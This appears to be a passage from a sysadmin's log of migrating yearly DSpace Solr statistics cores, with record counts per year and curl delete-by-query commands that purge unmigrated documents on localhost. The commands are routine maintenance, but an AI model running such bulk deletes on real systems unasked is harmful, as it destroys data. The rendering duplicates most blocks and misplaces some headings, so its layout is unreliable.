<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx4096m&#39;</span>
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2018
</span></span></code></pre></div><p>Eventually the processing finished. Here are some statistics about unmigrated documents:</p>
<ul>
<li>365,473: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>546,955: <code>id:/.+-unmigrated/</code></li>
<li>923,158: <code>*:* NOT id:/.{36}/</code></li>
<li>823,293: are <code>type: 5</code> so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2017">statistics-2017</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2017">statistics-2017</h2>
<p>Processing the statistics-2017 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2017
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 2,529,208 Bistream View
1,618,717 Item View
144,945 Community View
74,249 Collection View
479,647 Community Search
114,658 Collection Search
852,215 Unexpected Type &amp; Full Site
--------------------------------------
5,813,639 TOTAL
=================================================================
</code></pre></div><p>Eventually the processing finished. Here are some statistics about unmigrated documents:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2017
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 2,529,208 Bistream View
</span></span><span style="display:flex;"><span> 1,618,717 Item View
</span></span><span style="display:flex;"><span> 144,945 Community View
</span></span><span style="display:flex;"><span> 74,249 Collection View
</span></span><span style="display:flex;"><span> 479,647 Community Search
</span></span><span style="display:flex;"><span> 114,658 Collection Search
</span></span><span style="display:flex;"><span> 852,215 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 5,813,639 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Eventually the processing finished. Here are some statistics about unmigrated documents:</p>
<ul>
<li>808,309: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>893,868: <code>id:/.+-unmigrated/</code></li>
<li>1,702,177: <code>*:* NOT id:/.{36}/</code></li>
<li>1,660,524 are <code>type: 5</code> (SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2017/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2016">statistics-2016</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2017/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2016">statistics-2016</h2>
<p>Processing the statistics-2016 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2016
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 1,765,924 Bistream View
1,151,575 Item View
187,110 Community View
51,204 Collection View
347,382 Community Search
66,605 Collection Search
620,298 Unexpected Type &amp; Full Site
--------------------------------------
4,190,098 TOTAL
=================================================================
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2016
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 1,765,924 Bistream View
</span></span><span style="display:flex;"><span> 1,151,575 Item View
</span></span><span style="display:flex;"><span> 187,110 Community View
</span></span><span style="display:flex;"><span> 51,204 Collection View
</span></span><span style="display:flex;"><span> 347,382 Community Search
</span></span><span style="display:flex;"><span> 66,605 Collection Search
</span></span><span style="display:flex;"><span> 620,298 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 4,190,098 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><ul>
<li>849,408: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>627,747: <code>id:/.+-unmigrated/</code></li>
<li>1,477,155: <code>*:* NOT id:/.{36}/</code></li>
<li>1,469,706 are <code>type: 5</code> (SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2016/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2015">statistics-2015</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2016/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2015">statistics-2015</h2>
<p>Processing the statistics-2015 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2015
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 990,916 Bistream View
506,070 Item View
116,153 Community View
33,282 Collection View
21,062 Community Search
10,788 Collection Search
52,107 Unexpected Type &amp; Full Site
--------------------------------------
1,730,378 TOTAL
=================================================================
</code></pre></div><p>Summary of stats after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2015
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 990,916 Bistream View
</span></span><span style="display:flex;"><span> 506,070 Item View
</span></span><span style="display:flex;"><span> 116,153 Community View
</span></span><span style="display:flex;"><span> 33,282 Collection View
</span></span><span style="display:flex;"><span> 21,062 Community Search
</span></span><span style="display:flex;"><span> 10,788 Collection Search
</span></span><span style="display:flex;"><span> 52,107 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 1,730,378 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of stats after processing:</p>
<ul>
<li>195,293: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>67,146: <code>id:/.+-unmigrated/</code></li>
<li>262,439: <code>*:* NOT id:/.{36}/</code></li>
<li>247,400 are <code>type: 5</code> (SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2015/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2014">statistics-2014</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2015/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2014">statistics-2014</h2>
<p>Processing the statistics-2014 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2014
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 2,381,603 Item View
1,323,357 Bistream View
501,545 Community View
247,805 Collection View
250 Collection Search
188 Community Search
50 Item Search
10,918 Unexpected Type &amp; Full Site
--------------------------------------
4,465,716 TOTAL
=================================================================
</code></pre></div><p>Summary of unmigrated documents after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2014
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 2,381,603 Item View
</span></span><span style="display:flex;"><span> 1,323,357 Bistream View
</span></span><span style="display:flex;"><span> 501,545 Community View
</span></span><span style="display:flex;"><span> 247,805 Collection View
</span></span><span style="display:flex;"><span> 250 Collection Search
</span></span><span style="display:flex;"><span> 188 Community Search
</span></span><span style="display:flex;"><span> 50 Item Search
</span></span><span style="display:flex;"><span> 10,918 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 4,465,716 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of unmigrated documents after processing:</p>
<ul>
<li>182,131: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>39,947: <code>id:/.+-unmigrated/</code></li>
<li>222,078: <code>*:* NOT id:/.{36}/</code></li>
<li>188,791 are <code>type: 5</code> (SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2014/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2013">statistics-2013</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2014/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2013">statistics-2013</h2>
<p>Processing the statistics-2013 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2013
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 2,352,124 Item View
1,117,676 Bistream View
575,711 Community View
171,639 Collection View
248 Item Search
7 Collection Search
5 Community Search
1,452 Unexpected Type &amp; Full Site
--------------------------------------
4,218,862 TOTAL
=================================================================
</code></pre></div><p>Summary of unmigrated docs after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2013
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 2,352,124 Item View
</span></span><span style="display:flex;"><span> 1,117,676 Bistream View
</span></span><span style="display:flex;"><span> 575,711 Community View
</span></span><span style="display:flex;"><span> 171,639 Collection View
</span></span><span style="display:flex;"><span> 248 Item Search
</span></span><span style="display:flex;"><span> 7 Collection Search
</span></span><span style="display:flex;"><span> 5 Community Search
</span></span><span style="display:flex;"><span> 1,452 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 4,218,862 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
<ul>
<li>2,548 : <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>29,772: <code>id:/.+-unmigrated/</code></li>
<li>32,320: <code>*:* NOT id:/.{36}/</code></li>
<li>15,691 are <code>type: 5</code> (SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2013/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2012">statistics-2012</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2013/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2012">statistics-2012</h2>
<p>Processing the statistics-2012 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2012
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 2,229,332 Item View
913,577 Bistream View
215,577 Collection View
104,734 Community View
--------------------------------------
3,463,220 TOTAL
=================================================================
</code></pre></div><p>Summary of unmigrated docs after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2012
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 2,229,332 Item View
</span></span><span style="display:flex;"><span> 913,577 Bistream View
</span></span><span style="display:flex;"><span> 215,577 Collection View
</span></span><span style="display:flex;"><span> 104,734 Community View
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 3,463,220 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
<ul>
<li>0: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>33,161: <code>id:/.+-unmigrated/</code></li>
<li>33,161: <code>*:* NOT id:/.{36}/</code></li>
<li>33,161 are <code>type: 3</code> (COLLECTION), which is different than I&rsquo;ve seen previously&hellip; but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2011">statistics-2011</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2011">statistics-2011</h2>
<p>Processing the statistics-2011 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2011
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 904,896 Item View
385,789 Bistream View
154,356 Collection View
62,978 Community View
--------------------------------------
1,508,019 TOTAL
=================================================================
</code></pre></div><p>Summary of unmigrated docs after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2011
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 904,896 Item View
</span></span><span style="display:flex;"><span> 385,789 Bistream View
</span></span><span style="display:flex;"><span> 154,356 Collection View
</span></span><span style="display:flex;"><span> 62,978 Community View
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 1,508,019 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
<ul>
<li>0: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>17,551: <code>id:/.+-unmigrated/</code></li>
<li>17,551: <code>*:* NOT id:/.{36}/</code></li>
<li>12,116 are <code>type: 3</code> (COLLECTION), which is different than I&rsquo;ve seen previously&hellip; but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2011/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2010">statistics-2010</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2011/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2010">statistics-2010</h2>
<p>Processing the statistics-2010 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2010
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 26,067 Item View
15,615 Bistream View
4,116 Collection View
1,094 Community View
--------------------------------------
46,892 TOTAL
=================================================================
</code></pre></div><p>Summary of unmigrated docs after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2010
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 26,067 Item View
</span></span><span style="display:flex;"><span> 15,615 Bistream View
</span></span><span style="display:flex;"><span> 4,116 Collection View
</span></span><span style="display:flex;"><span> 1,094 Community View
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 46,892 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
<ul>
<li>0: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>1,012: <code>id:/.+-unmigrated/</code></li>
<li>1,012: <code>*:* NOT id:/.{36}/</code></li>
<li>654 are <code>type: 3</code> (COLLECTION), which is different from what I&rsquo;ve seen previously&hellip; but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h3 id="processing-solr-statistics-with-atomicstatisticsupdatecli">Processing Solr statistics with AtomicStatisticsUpdateCLI</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h3 id="processing-solr-statistics-with-atomicstatisticsupdatecli">Processing Solr statistics with AtomicStatisticsUpdateCLI</h3>
<p>On 2020-11-18 I finished processing the Solr statistics with solr-upgrade-statistics-6x and I started processing them with AtomicStatisticsUpdateCLI.</p>
<h2 id="statistics-1">statistics</h2>
<p>First the current year&rsquo;s statistics core, in 12-hour batches:</p>
